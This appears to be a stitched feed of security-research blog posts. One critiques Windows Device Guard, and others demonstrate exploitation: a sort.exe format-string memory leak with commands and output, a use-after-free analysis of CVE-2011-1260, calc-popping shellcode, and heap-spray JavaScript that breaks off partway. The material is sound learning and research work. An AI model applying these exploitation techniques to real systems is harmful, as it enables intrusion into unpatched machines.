  • Using Device Guard to Mitigate Against Device Guard Bypasses
  • Windows Device Guard Code Integrity Policy Reference
  • Device Guard Code Integrity Policy Auditing Methodology
  • On the Effectiveness of Device Guard User Mode Code Integrity
  • Code Integrity on Nano Server: Tips/Gotchas
  • Updating Device Guard Code Integrity Policies
  • Adventures in Extremely Strict Device Guard Policy Configuration Part 1 — Device Drivers
  • The EMET Attack Surface Reduction Replacement in Windows 10 RS3: The Good, the Bad, and the Ugly
  • BlueHat Israel (presented with Casey Smith) - Device Guard Attack Surface, Bypasses, and Mitigations
  • PowerShell Conference EU - Architecting a Modern Defense using Device Guard and PowerShell

  • For me, the appeal of Device Guard (and application whitelisting in general) was and remains as follows: Every… single… malware report I read whether its vanilla crimeware, red team/pentester tools, or nation-state malware has at least one component of their attack chain that would have been blocked and subsequently logged with a robust application whitelisting policy enforced. The idea that a technology could not only prevent, but also supply indications and warnings of well-funded nation-state attacks is extremely enticing. In practice however, at scale (and even on single systems to a lesser extent), both the implementation of Device Guard and the overall ability of the OS to enforce code integrity (particularly in user mode) begin to fall apart.

    The Airing of Grievances



    Based on my extensive experience working with Device Guard (which includes regularly subverting it), here is what I see as its shortcomings:

    • An application whitelisting solution that does not supply the ability to create temporary exemptions is unlikely to be a viable solution in the enterprise. This point becomes clear when you consider the following scenario: A new, prospective or current client asks you to join their teleconferencing solution with 30 minutes notice. Telling them that you cannot join because your enforced security solution won’t permit it is simply an unacceptable answer. Some 3rd party whitelisting solutions do permit temporary, quick exceptions to policy and audit accordingly. As a Device Guard expert myself, even if every component of a software package is consistently signed using the same code signing certificate (which is extremely rare), even I wouldn’t be able to build signer rules, update an existing policy, and deploy it in time for the client conference call.
    • Device Guard is not designed to be placed into audit mode for the purposes of supplementing your existing detections. I recently completed a draft blog post where I was going to highlight the benefits of using Device Guard as an extremely simple and effective means to supplement existing detections. After writing the post however, I discovered that it will only log the loading of an image that would have otherwise been blocked once per boot. This is unacceptable from a threat detection perspective because it would introduce a huge visibility gap. I can only assume that Device Guard in audit mode was only ever designed to facilitate the creation of an enforcement policy.
    • The only interface to the creation and maintenance of Device Guard code integrity policies is the ConfigCI PowerShell module which only works on Windows 10 Enterprise. As not only a PowerShell MVP and a Device Guard expert, I shamefully still struggle with using this very poorly designed module. If I still struggle with using the module, this doesn’t bode well for non-PowerShell and Device Guard experts.
    • Feel free to highlight precisely why I’m wrong with supporting evidence but I sense I’m one of the few people outside of Microsoft or even inside Microsoft who have supplied documentation on practical use cases for configuring and deploying Device Guard. The utter absence of others within Microsoft or the community embracing Device Guard at least supplies me with indirect evidence that it not a realistic preventative solution at scale. I’ll further note that I don’t feel that Device Guard was ever designed from the beginning as an enterprise security solution. It has the feel that it simply evolved as an extension of Secure Boot policy from the Windows RT era.
    • While the servicing efforts for PowerShell constrained language mode have been mostly phenomenal, the servicing of other Device Guard bypasses has been inconsistent at best. For example, this generic bypass still has yet to be fixed. There is an undocumented “Enabled:Dynamic Code Security” policy rule option that is designed to address that bypass (which is great that it's finally being address) but it suffers from a bug that prevents it from working as of Win 10 1803 (it fails to validate the trust of the emitted binary because it forgets to actually mark it as trusted). Additionally, Casey Smith’s “SquiblyTwo” bypass was never serviced, opening the door for additional XSL-based bypasses (which I can confirm exist but I can’t talk about at the time of this writing). Rather, it is just recommended that you blacklist wmic.exe. There is also no robust method to block script-based bypasses.
    • The strategy with maintaining AppLocker moving forward remains ambiguous. AppLocker still benefits to this day by its ability to apply rulesets to user and groups, unlike Device Guard. It also has a slightly better PowerShell module and a GUI.
    • Any new features in Device Guard are consistently not documented aside from me occasionally diffing code integrity policy schemas across Windows builds. For example, one of the biggest recent feature additions is the “Enabled:Intelligent Security Graph Authorization” policy rule option which is the feature that actually transformed Device Guard from a pure whitelisting solution to that of an application control solution, yet, it has only a single line mentioning the feature in the documentation.
    • As far as application whitelisting on Windows is concerned, from a user-mode enforcement perspective, staying on top of blocking new, non-PE based code execution vectors remains an intractable problem. Whether it’s the introduction of code execution vectors (e.g. Windows Subsystem for Linux) or old code execution techniques being rediscovered (e.g. the fact that you can embed arbitrary WSH scripts in XSL docs). People like myself, Casey Smith, Matt Nelson, and many others in the industry recognize the inability of vendors and those implementing application whitelisting solutions to keep pace with blocking/detecting signed applications that permit the execution of arbitrary, unsigned code which fundamentally subvert user mode code integrity (UMCI). This is precisely what motivates us to continue our research in identifying those target applications/scripts.

    So what is Device Guard good for then?


    What I still love about Device Guard is that it’s the only solution that allows you to apply policy to kernel images (even in the very early boot phase). Regardless of the application whitelisting solution, user mode policy configuration, deployment, and maintenance is really difficult. The appeal of driver enforcement is that Windows requires that all drivers be signed, meaning, the creation of signer rules is relatively straightforward and the set of required drivers is far smaller than the set of required user mode code.

    Aside from that, I honestly see very little benefit in using Device Guard for user-mode enforcement or detection aside from using it on systems with extremely consistent hardware and software configurations - e.g. point of sale, ATMs, medical devices, etc.

    For the record, I still use Device Guard to enforce kernel and user mode rules on my personal computers. I still cringe, however, any time I have to make updates to my policy, particularly, for software that isn’t signed or is inconsistently signed.

    Are you admitting that you wasted the past few years dedicating much of your research time to Device Guard?


    Absolutely not!!! I try my best to invest in new security technologies as a motivation to research new abuse and subversion opportunities and Device Guard was no exception. It motivated me to take a deep dive into code signing and signature enforcement which resulted in me learning about and abusing all the internals of subject interface packages and trust providers. It also motivated me to identify and report countless Device Guard and PowerShell Constrained Language Mode bypasses all of which not only bypass application whitelisting solutions but represent attacker tradecraft that subvert many AV/EDR solutions.

    I also personally have a hard time blindly accepting the opinions of others (even those who are established, respected experts in their respective domains) without personally assessing the efficacy and limitations of a security solution myself. As a result of all my Device Guard research, I now have a very good sense of what does work and what doesn’t work in an application whitelisting solution. I am very grateful for the opportunity that Device Guard presented to motivate me to learn so much more about code signing validation.

    What I’m hopeful for in the future


    While I don’t see a lot of investment behind Device Guard compared to other security technologies (like Defender and Advanced Threat Protection), I sense that Microsoft is throwing a lot of their weight behind Windows Defender System Guard runtime attestation, some of the details of which are slowly starting to surface which I’m really excited about assuming the attestation rule engine is extended to 3rd parties. This tweet from Dave Weston I can only assume highlights System Guard in action blocking semi-legitimate signed drivers whereas a relatively simple Device Guard policy would have implicitly blocked those drivers.

    Conclusion


    My intent is certainly not to dissuade people from assessing the feasibility of Device Guard in your respective environment. Rather, I want to be as open and transparent about the issues I’ve encountered over the years working with it. My hope is to ignite an open and honest conversation about how application whitelisting in Windows can be improved or if it’s even a worthwhile investment in the first place.

    As a final note, I want to encourage everyone to dive as deep as you can into technology you’re interested in. There are a lot (I can’t emphasize “a lot” enough) of curmudgeons and detractors who will tell you that you’re wasting your time. Don’t listen to them. Only you (and trusted mentors) should dictate the path of your curiosity! I may no longer be the zealous proponent of application whitelisting that I used to be but I could not be more grateful for the incredible technology Microsoft gave me the opportunity to dive into, upon which, I was able to draw my own conclusions.

    Welcome!

    $
    0
    0
    The fact that you are reading this indicates that you and I share a similar passion for exploiting software vulnerabilities. My primary intent with this blog is to motivate myself to learn new exploitation concepts and techniques. The blog will chronicle my feeble attempt to become moderately competent in exploiting software. By sharing what I've learned, my hope is that you will walk away having learned something useful as well. If through the course of my posting I happen to come up with something useful and innovative, great! If you find that I'm reinventing the wheel, so be it. Again, the purpose is to guide me along to my ultimate goal of becoming a legitimate security researcher.

    My first official post will pertain to some brief research I did on memory leaks and the predictability of ASLR on Win32.

    Leveraging format string vulnerabilities to interrogate Win32 process memory

    $
    0
    0
    Although format string vulnerabilities aren't seen as much in the wild these days since they are so easy to spot in source code, I'd like to use this class of vulnerability to demonstrate what information can be inferred from a memory leak. Format string vulnerabilities open a window into the stack, allowing you to interrogate process memory. As a case study I'll be utilizing a format string vulnerability in a Windows utility that has persisted since the dawn of unix time - sort.

    The vulnerability lies in the filename command line argument of the sort utility. The source likely implements the following function call[1]:

    fprintf(file_stream, filename);

    Secure format strings 101 would teach you that this is wrong. Nonetheless, some crusty old Microsoft employee made the mistake and MS has deemed this vulnerability not important enough to update. I digress.

    Some notes about Microsoft's implementation of fprintf in sort as of XP SP3 - Windows 7:
    • The %n format specifier is disabled preventing arbitrary 4-byte overwrites
    • Direct parameter access (%5$p) is disabled which results in very long format strings

    The following example shows the layout of the function arguments on the stack:

    C:\>sort AAAA:%p:%p:%p:%p:%p:%p:%p:
    AAAA:761A35D9:00000000:00000000:00000000:003F47C8:0000001A:41414141:

    Knowledge of the how arguments are passed to the printf function would indicate the following:
    • 1st dword: address of the FILE struct
    • 5th dword: pointer to format-string (unicode)
    • 6th dword: number of characters printed
    • 7th dword: hex representation of the first four characters of the format string

    To show that the 5th dword actually points to a unicode representation of the format string, the command can be edited as follows:

    C:\>sort AAAA:%p:%p:%p:%p:%ls
    AAAA:761A35D9:00000000:00000000:00000000:AAAA:%p:%p:%p:%p:%ls:%p:...

    By dereferencing the pointer as a wide string (%ls), the format string was reflected in stderr.

    Some analysis of the above output indicates the presensence of ASLR:

    C:\>for /L %i in (1,1,20) do @(sort AAAA:%p:%p:%p:%p:%p:)
    AAAA:761A35D9:00000000:00000000:00000000:000547A8:...
    AAAA:761A35D9:00000000:00000000:00000000:003747A8:...
    AAAA:761A35D9:00000000:00000000:00000000:000E47A8:...
    AAAA:761A35D9:00000000:00000000:00000000:003F47A8:...
    AAAA:761A35D9:00000000:00000000:00000000:001747A8:...
    AAAA:761A35D9:00000000:00000000:00000000:001847A8:...
    AAAA:761A35D9:00000000:00000000:00000000:002247A8:...
    AAAA:761A35D9:00000000:00000000:00000000:001747A8:...
    AAAA:761A35D9:00000000:00000000:00000000:000647A8:...
    AAAA:761A35D9:00000000:00000000:00000000:001147A8:...
    AAAA:761A35D9:00000000:00000000:00000000:002347A8:...
    AAAA:761A35D9:00000000:00000000:00000000:004047A8:...
    AAAA:761A35D9:00000000:00000000:00000000:002E47A8:...
    AAAA:761A35D9:00000000:00000000:00000000:003847A8:...
    AAAA:761A35D9:00000000:00000000:00000000:002747A8:...
    AAAA:761A35D9:00000000:00000000:00000000:002847A8:...
    AAAA:761A35D9:00000000:00000000:00000000:003947A8:...
    AAAA:761A35D9:00000000:00000000:00000000:002C47A8:...
    AAAA:761A35D9:00000000:00000000:00000000:001A47A8:...
    AAAA:761A35D9:00000000:00000000:00000000:002947A8:...

    Notice that the 2nd byte of the format string pointer changes each time. After sampling approximately 10000 addresses, some interesting statistics were gleaned:

    2nd byte Occurances Rate of occurance
    05       117        1.2%
    06       135        1.4%
    07       109        1.1%
    08        97        1.0%
    09       151        1.5%
    0A       129        1.3%
    0B       147        1.5%
    1C       124        1.2%
    1D       156        1.6%
    1E       193        1.9%
    1F       225        2.3%
    20       192        1.9%
    21       211        2.1%
    22       199        2.0%
    23       207        2.1%
    24       199        2.0%
    25       198        2.0%
    26       213        2.1%
    27       241        2.4%
    28       185        1.9%
    29       238        2.4%
    2A       256        2.6%
    2B       268        2.7%
    2C       246        2.5%
    2D       277        2.8%
    2E       285        2.9%
    2F       275        2.8%
    30       318        3.2%
    31       310        3.1%
    32       321        3.2%
    33       293        2.9%
    34       301        3.0%
    35       331        3.3%
    36       301        3.0%
    37       312        3.1%
    38       306        3.1%
    39       323        3.2%
    3A       312        3.1%
    3B       306        3.1%
    3C       102        1.0%
    3D       121        1.2%
    3E       108        1.1%
    3F        94        0.9%
    40        99        1.0%
    41        90        0.9%
    42        87        0.9%
    43        67        0.7%
    44        54        0.5%
    45        41        0.4%
    46        35        0.4%
    47        32        0.3%
    48        22        0.2%
    49        10        0.1%

    Occurances divided by 5 (to save space)
    ==================================
    05 #######################
    06 ###########################
    07 #####################
    08 ###################
    09 ##############################
    0A #########################
    0B #############################
    1C ########################
    1D ###############################
    1E ######################################
    1F #############################################
    20 ######################################
    21 ##########################################
    22 #######################################
    23 #########################################
    24 #######################################
    25 #######################################
    26 ##########################################
    27 ################################################
    28 #####################################
    29 ###############################################
    2A ###################################################
    2B #####################################################
    2C #################################################
    2D #######################################################
    2E #########################################################
    2F #######################################################
    30 ###############################################################
    31 ##############################################################
    32 ################################################################
    33 ##########################################################
    34 ############################################################
    35 ##################################################################
    36 ############################################################
    37 ##############################################################
    38 #############################################################
    39 ################################################################
    3A ##############################################################
    3B #############################################################
    3C ####################
    3D ########################
    3E #####################
    3F ##################
    40 ###################
    41 ##################
    42 #################
    43 #############
    44 ##########
    45 ########
    46 #######
    47 ######
    48 ####
    49 ##

    Most frequently used address: 0x0035XXXX
    Times used: 331

    As indicated in this beautiful ASCII bar graph, ASLR clearly favors some adresses over others. This lack of entropy (5-6 bits according to this data) would also indicate that these are heap addresses. Ollie Whitehouse wrote an excellent paper[2] on the analysis of ASLR in Vista so I will keep my entropy analysis short and sweet.

    To demonstrate the weakness of ASLR in the heap, I'll show that within several attempts, one can read arbitrary data from the heap. As an example, I will read a portion of the environment variables stored in the heap (in unicode). The environment variables are generally stored in the same area relative to their allocated page in memory. Since we know an address in the heap - the format string pointer and a likely value for the second byte in the address, we should be able to read memory given enough tries. My format string is set up in the following manner:

    sort AAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%pZZCBA

    By changing the last format specifier (%p) to %ls, I can dereference 0x00414243 as a wide string (note little-endianness). I want to dereference a likely heap address though. A portion of the environment variables are usually stored in the vicinity of 0x00XX0E30. I'll go with 2E for the 2nd byte because I'm feeling lucky. To deference 0x002E0E30, the format string will have to be updated:

    sort AAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p:%ls0^N.
    where ^N can be entered by pressing ALT-014

    Note that this will likely crash several times since you may be dereferencing unallocated memory. However, after 14 trials, a portion of the path variable was revealed:

    C:\>sort AAAA%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p:%ls0^N.
    AAAA761A35D9000000000000000000000000002E48200000002B414141417025702570257025702570257025702570257025702570257025702570257025736C253:\windows\System32\W
    indowsPowerShell\v1.0\;C:\PROGRA~1\DISKEE~1\DISKEE~1\;C:\Program Files\QuickTime\QTSystem\;C:\Program Files\Windows Imaging\0♫.The system cannot find
    the file specified.

    Is this useful? Probably not. I merely chose this example to demonstrate the weakness of ASLR in the heap.

    So now that heap addresses have been located, what about stack addresses? The following, gargantuan format string will shed some light on this:



    It would appear as if there are some saved frame pointers, function arguments, local variables, and return pointers here. Let's do some more analysis to be more certain:

    I ran the above command 20 times and truncated everything but a portion of the lower part of the stack, which yielded the following:

    :00000081:0011EC04:000000CB:00010000:00010580:0011EC04:77B46FEA:77B47026:7916B8C8:00010000:...
    :00000081:001AE7C0:000000CB:00010000:00010580:001AE7C0:77B46FEA:77B47026:791DB34A:00010000:...
    :00000081:0018EB10:000000CB:00010000:00010580:0018EB10:77B46FEA:77B47026:791FBFA9:00010000:...
    :00000081:0012E614:000000CB:00010000:00010580:0012E614:77B46FEA:77B47026:7915B27C:00010000:...
    :00000081:001FEAB4:000000CB:00010000:00010580:001FEAB4:77B46FEA:77B47026:7918BE92:00010000:...
    :00000081:0015E780:000000CB:00010000:00010580:0015E780:77B46FEA:77B47026:7912B055:00010000:...
    :00000081:0018E608:000000CB:00010000:00010580:0018E608:77B46FEA:77B47026:791FB18C:00010000:...
    :00000081:000DEC88:000000CB:00010000:00010580:000DEC88:77B46FEA:77B47026:790ABB3B:00010000:...
    :00000081:0009EB10:000000CB:00010000:00010580:0009EB10:77B46FEA:77B47026:790EBC61:00010000:...
    :00000081:0018EB18:000000CB:00010000:00010580:0018EB18:77B46FEA:77B47026:791FBC38:00010000:...
    :00000081:000BE71C:000000CB:00010000:00010580:000BE71C:77B46FEA:77B47026:790CB1D3:00010000:...
    :00000081:000BE8F4:000000CB:00010000:00010580:000BE8F4:77B46FEA:77B47026:790CBE79:00010000:...
    :00000081:0012E954:000000CB:00010000:00010580:0012E954:77B46FEA:77B47026:7915BFE8:00010000:...
    :00000081:000AE8D8:000000CB:00010000:00010580:000AE8D8:77B46FEA:77B47026:790DBEB3:00010000:...
    :00000081:001CEA90:000000CB:00010000:00010580:001CEA90:77B46FEA:77B47026:791BBCB9:00010000:...
    :00000081:0008E4F4:000000CB:00010000:00010580:0008E4F4:77B46FEA:77B47026:790FBD2C:00010000:...
    :00000081:001EEA1C:000000CB:00010000:00010580:001EEA1C:77B46FEA:77B47026:7919B39B:00010000:...
    :00000081:000EE95C:000000CB:00010000:00010580:000EE95C:77B46FEA:77B47026:7909B1AD:00010000:...
    :00000081:0019E7F8:000000CB:00010000:00010580:0019E7F8:77B46FEA:77B47026:791EBF57:00010000:...
    :00000081:000BE574:000000CB:00010000:00010580:000BE574:77B46FEA:77B47026:790CBD2A:00010000:...

    Look at the dwords 2, 6, and 9. The last 6 bytes are different after each run. This result is consistant with the ASLR implementation of 14 bits of entropy in the stack. So now we've positively identified heap, and stack addresses (process or thread). Now, notice dwords 7-8. The addresses do not change and they are consistant with addresses to loaded modules. To prove this, if you rebooted, and analyzed the same portion of the stack, the addresses would be different since loaded modules are only randomized after reboots.

    Conclusion:

    With just a little bit of context, you can easily infer the type of data/code on the stack. In fact, ASLR actually helps in determining the difference between the stack, heap, PEB, and image base (loaded module code) due to the difference in entropy bits.

    This serves as an example where memory leaks coupled with memory corruption despite modern exploit mitigations will very likely lead to code execution. In the context of a format string vulnerability, even if %n is disabled, at the very minimum, shellcode can be placed into memory via the format string. Given any combination of vulnerabilties, the exploitation possibilities are numerous. However, increasingly, with all the modern exploit mitigations, exploitation is becoming very application-specific.

    As a refresher here are some useful addresses in memory can help lead to code execution:
    • FS:[0] - Pointer to the SEH chain
    • FS:[30] - Pointer to the PEB
    • Executable's .data + 4 offset: master GS cookie
    • PEB+20: FastPEBLock pointer
    • PEB+24: FastPEBUnlock
    • Stack return pointers: duh
    • Function pointers
    • C++ Vtables

    Links for reference:

    1. Microsoft, "Format Specification Fields: printf and wprintf Functions," http://msdn.microsoft.com/en-us/library/56e442dc.aspx

    2. O. Whitehouse, "An Analysis of Address Space Layout Randomization on Windows Vista™," 2007, http://www.symantec.com/avcenter/reference/Address_Space_Layout_Randomization.pdf

    Post-mortem Analysis of a Use-After-Free Vulnerability (CVE-2011-1260)

    $
    0
    0
    Recently, I've been looking into the exploitation of use-after-free vulnerabilities. This class of bug is very application specific, but armed with just the right amount of knowledge these vulnerabilities can be exploited to bypass most modern OS exploit mitigations. After reading Nephi Johnson's (@d0c_s4vage) excellent article[1] on exploiting an IE use-after-free vulnerability, I decided to ride his coattails and show the steps I used to analyze his proof-of-concept crash code.

    As shown in his blog post, here is Nephi's test case that crashes IE:
    Internet Explorer crashes at mshtml!CElement::Doc+0x2

    76c.640): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=004aedc0 ecx=004e00e9 edx=00000000 esi=0209e138 edi=00000000
    eip=6d55c402 esp=0209e10c ebp=0209e124 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
    mshtml!CElement::Doc+0x2:
    6d55c402 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:00000070=????????

    Here is the order of execution leading to the crash:

    mshtml!CTreeNode::ComputeFormats+0x42
    6d58595a 8b0b            mov     ecx,dword ptr [ebx]
    6d58595c e89f6afdff      call    mshtml!CElement::Doc (6d55c400)
    mshtml!CElement::Doc:
    6d55c400 8b01            mov     eax,dword ptr [ecx]
    6d55c402 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:00000070=????????
    6d55c405 ffd2            call    edx

    This is a classic C++ use-after-free vulnerability. IE is trying to call a function within a previously freed object's virtual function table. In the disassembly above, a pointer to some object [EBX] has a pointer to its virtual function table [ECX] that subsequently calls a function at offset 0x70 in its vftable [EAX+0x70].

    What we need to find out is what type of object was freed and how many bytes get allocated for that object. That way, we can craft fake objects of that size (using javascript) whose vftable at offset 0x70 point to our shellcode.

    Since mshtml!CTreeNode::ComputeFormats+0x42 points to the object in question (in EBX), I set a breakpoint in Windbg on that instruction and got the following:
    As can be seen above, EBX points to a freed CObjectElement object. How can we know for sure that the object was freed and that it points to a CObjectElement object? Enabling the page heap and user stack traces of every call to malloc and free will do the trick. This technique also allows us to observe the size allocated to CObjectElement.
    The size that gets allocated to the CObjectElement object is 0xE0. It is also handy to see the call stacks of what allocated and freed the object. The size allocated for the object was determined via dynamic analysis. There's more than one way to skin a cat though. The same information can be gleaned via static analysis. A brief glance of the mshtml!CObjectElement::CreateElement function (which was called in the call stack above) in IDA shows that 0xE0 bytes is allocated for CObjectElement.


    According to the disassembly (for CObjectElement::CObjectElement), the actual size of the class is 0xDC. However, 0xE0 is allocated on the heap because the compiler rounded up the size to the nearest DWORD boundary.


    Lastly, although it is not always necessary for exploitation, let's determine the actual function that should have been called at the time of the crash. This can be accomplished several ways in Windbg.
    The function that should have been called was mshtml!CElement::SecurityContext.

    So to refresh our memories, what was needed to begin exploiting a use-after-free bug?

    1) The type of object referenced after being freed
    2) The size allocated to the object

    There is no magic command that will give you this information and as usual, there is always more than one way to obtain this information. The key is to understand what lead to the crash. The next step is to utilize javascript to declare string variables that will allocate fake objects in the heap that point to attacker controlled shellcode (via heap spraying). This can be accomplished reliably without needing to point to a typical address like 0x0C0C0C0C which serves as both an address in the heap and a NOP slide. More on that in a future blog post...

    References:

    1. N. Johnson, "Insecticides don't kill bugs, Patch Tuesdays do,"
    June 16, 2011, http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html

    Cool kids pop a programmer's calc in their demos

    $
    0
    0
    Over time, I've heard several well-respected security professionals mention that you're not really cool unless you can pop a scientific/programmer's calculator when demoing your exploits. I mean, what right does a standard, run of the mill calculator have showing its face to a crowd of enthralled conference attendees watching the latest version of Windows 7 get totally pwned? And how many self-respecting security folks use a standard calc more than the programmer's calc? So rather than waste the time of the people who thought this would be cool, I thought it would be better to waste my own time to complete this silly challenge. So without further ado, prepare to do some hexadecimal math. I'd like to mention that Jacob Appelbaum (@ioerror) and Aaron Portnoy (@aaronportnoy) inspired me to write this. ;D

    To start, I used procmon to observe how calc was interacting with the OS when switching from standard to programmer's mode.


    It turns out that it modifies the following registry key: HKCU\Software\Microsoft\Calc\layout and changes the REG_DWORD value to 0x00000002 when switching to a programmer's calc.

    One of the nice features of procmon is that it lets you view the stack trace of each entry. Here's the stack trace for the call to RegSetValue:


    So, to get my shellcode to work, I'll likely need to understand how calc.exe modifies the registry. After loading calc.exe into IDA, I quickly determined that it calls the folowing functions, which procmon graciously gave me the offsets to:

    • RegCreateKeyExW
    • RegSetValueExW
    • RegCloseKey

    IDA in conjunction with my debugger conveniently gave me all the parameters I needed to pass to these functions. For more information on the function parameters, refer to MSDN documentation.

    The only problem is that the shellcode needs to first determine the addresses to these functions, which turns out to be the bulk of my shellcode. I should be careful when saying 'my' shellcode considering I modified SkyLined's awesome w32-exec-calc-shellcode[1] which I believe was loosely based upon Matt Miller's paper - "Understanding Windows Shellcode[2]."

    It's worth noting that if your shellcode is running in the stack, careful considerations must be made when writing your assembly. Specifically, the shellcode instructions and function parameters share the same space. Because you are executing code from the stack, you have to be careful not to clobber your instructions. So what I did was move esp (which would point to the first instruction) into ebp [MOV EBP, ESP] and essentially create my own stack frame above the code.

    Here is the shellcode with relevant comments for your convenience. Note that this will only work on 32-bit Windows and it has only been tested on Windows 7 SP1 :

    w32-programmer-calc hex
    w32-programmer-calc assembly

    Areas of improvement:
    • Remove all nulls. This would be relatively easy but I am lazy. Perhaps in a future version.
    • Only one byte of this needs to be modified to pop a scientific calc on Vista. This can be left as an exercise for the readers.
    • This could scan for the OS version and determine dynamically whether to pop a scientific (pre-Windows 7) vs programmer's calc. Do you really want to be popping calcs on anything besides Windows 7 though? ;D
    • My assembly is likely total crap. But it works. I'm sure someone out there could trim a couple dozen bytes off it but I'll leave that as a challenge for the assembly ninjas out there.

    Please comment, try it out on your 32-bit Windows 7 machine for yourself, and let me know if it doesn't work and I might make an effort to fix it. Enjoy!

    References:

    1. Berend-Jan "SkyLined" Wever, w32-exec-calc-shellcode, http://code.google.com/p/w32-exec-calc-shellcode/

    2. Matt Miller, "Understanding Windows Shellcode", December 6, 2003, http://www.hick.org/code/skape/papers/win32-shellcode.pdf

    Integrating WinDbg and IDA for Improved Code Flow Analysis

    $
    0
    0
    IDA is hands down the best tool for static analysis. Its debugger on the other hand, when compared to the power of WinDbg is certainly lacking, IMHO. As such, I find myself wasting too much time switching between windows and manually highlighting and commenting instructions in IDA as I trace through them in WinDbg. Fortunately, the power of IDApython can be unleashed to reduce this tedium.

    I was reading an older TippingPoint MindshaRE article from Cody Pierce entitled “Hit Tracing in WinDbg[1]” and was inspired by his ideas to implement my own IDApython script to better integrate WinDbg with IDA. While, I may be recreating many of his efforts, my primary intent was to get better at scripting in IDApython while improving upon my static/dynamic analysis workflow.

    The purpose of my script is to parse WinDbg log files for module base addresses, instruction addresses, references to register values, and pointer dereferences. Then, for every instruction you hit in your debug session, the corresponding instructions will be colored and commented accordingly and in a module base address-agnostic fashion.

    To get started, your WinDbg log file will need to display the following:

    • Disassembly of current instruction
    • Effective address for current instruction
    • Register state
    • Listing of loaded modules (optional, but highly recommended)

    The first three items should be enabled by default but can be re-enabled with the ‘.prompt_allow’ command. Your output should look like the following:

    eax=003762f8 ebx=006cc278 ecx=00000004 edx=00000000 esi=006cc420 edi=00000001
    eip=00491469 esp=0020e348 ebp=0020e388 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
    calc!CCalcEngine::DoOperation+0x6be:
    00491469 e8074efeff      call    calc!divrat (00476275)

    The reason it is ideal to include module base addresses in your log file is so that effective addresses can be calculated as offsets then added to the base address of the module in IDA. This helps because the module base address in WinDbg is often different than the base address in IDA. Also, this avoids having to modify the dumpfile to match IDA or rebase the addresses in IDA – both, a pain and unnecessary. My script parses the output of ‘lmp’ in WinDbg which outputs the base addresses of loaded modules minus symbol information.

    To continue riding Cody’s coattails, I’ll be analyzing the DoOperation function (0x00495001-0x00495051) in calc.exe as he did. I determined the beginning and ending addresses of the function with the following commands:

    0:000> X calc!*DoOperation*
    00495001 calc!CCalcEngine::DoOperation =
    0:000> BP 00495001
    0:000> g

    Entering in 1000 / 4 in calc

    Breakpoint 0 hit
    eax=00439220 ebx=0069c420 ecx=0069c278 edx=00000000 esi=0069c278 edi=00000000
    eip=00495001 esp=0032e95c ebp=0032ea4c iopl=0 nv up ei pl nz na pe nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
    calc!CCalcEngine::DoOperation:
    00495001 6a1c push 1Ch

    Step through function until return instruction

    0:000> PT
    eax=00000000 ebx=0069c420 ecx=00495051 edx=00445310 esi=0069c278 edi=00000000
    eip=00495051 esp=0032e95c ebp=0032ea4c iopl=0 nv up ei pl zr na pe nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
    calc!CCalcEngine::DoOperation+0xfa:
    00495051 c20c00 ret 0Ch
    0:000> g
    0:004> .logopen "calc.log"

    The following dump is the result of the operation 1000/4 in the function without stepping into calls (using the PA command):


    Obviously, manually annotating all of this information in IDA is the work of an unpaid intern. I, on the other hand, value my time and wrote the following script to parse out the log file and import it into IDA:


    The script has the following features:

    • Prompts user for WinDbg log file to load
    • Prompts user for the instruction highlight color (real men use pink) ;P
    • Parses the output of the ‘lmp’ command and calculates instruction offsets from the module base address
    • Creates comments for the values of referenced registers
    • Creates comments for the value of pointer dereferences

    Here is what the graph of DoOperation looks like before 1000 / 4 is performed:


    Here is what the graph of DoOperation looks like after 1000 / 4 is performed:


    You can see the highlighted instructions and the values of any referenced registers and pointers.


    Hopefully, by now you can see the power of IDApython in improving your analysis workflow. If you use this script, I welcome your feedback!

    References:

    1. Cody Pierce, “MindshaRE: Hit Tracing in WinDbg,” July 17, 2008, http://dvlabs.tippingpoint.com/blog/2008/07/17/mindshare-hit-tracing-in-windbg

    Targeted Heap Spraying – 0x0c0c0c0c is a Thing of the Past

    $
    0
    0

    Traditionally, heap spraying has relied upon spraying with 0x0C0C0C0C followed by shellcode which serves as both an address in the heap and a series of nops. This however is not extremely reliable. You have to be lucky enough to not land on a heap header or somewhere in your shellcode. Additionally, the latest version of EMET now prevents the execution of address 0x0C0C0C0C or any other arbitrary address specified in the registry. While this is a futile attempt to prevent heap spraying, it will require another method to reliably execute shellcode in the heap. Rather, there is a method that allows you to reliably allocate shellcode that is both in a predictable location and memory page-aligned (64K-aligned).

    It turns out that allocations in Javascript of at least 512K are allocated using VirtualAlloc, which returns addresses that are page aligned (i.e. in the form of 0xXXXX0000). I credit Alexander Sotirov with this discovery as I learned this technique from him. There are many ways to place shellcode in the heap but string allocations are the tried and true heap allocation primitive in javascript. The format of a javascript string on the heap is as follows:

    [string length - 4 bytes][Unicode encoded string][\x00\x00]

    The following diagram illustrates a string’s layout in memory:
     
    Therefore, any javascript string will be 6 bytes long plus the length of the Unicode encoded string. Also, heap chunks allocated with VirtualAlloc are 0x20 bytes in length. As a result, shellcode allocated through VirtualAlloc will always reside at offset 0x24. Also, because each allocation results in a 64K-aligned address, we can make a series of string allocations that equal exactly 64K. That way, the start of our shellcode will always be located at an address of the form (0xXXXX0024).

    The following javascript code takes advantage of these concepts by allocating an array of sixteen 64K strings (i.e. 1 megabyte).  Note the sixteenth allocation accounts for the size of the heap header and string length so that exactly one megabyte gets allocated. The resultant array is then allocated one hundred times resulting in an allocation of exactly 100MB.

    <html>
    <head>
    <script>
    function heapspray() {
        var shellcode = "\u4141";

        while (shellcode.length < 100000)
            shellcode = shellcode + shellcode;

        var onemeg = shellcode.substr(0, 64*1024/2);

        for (i=0; i<14; i++) {
            onemeg += shellcode.substr(0, 64*1024/2);
        }

        onemeg += shellcode.substr(0, (64*1024/2)-(38/2));

        var spray = new Array();

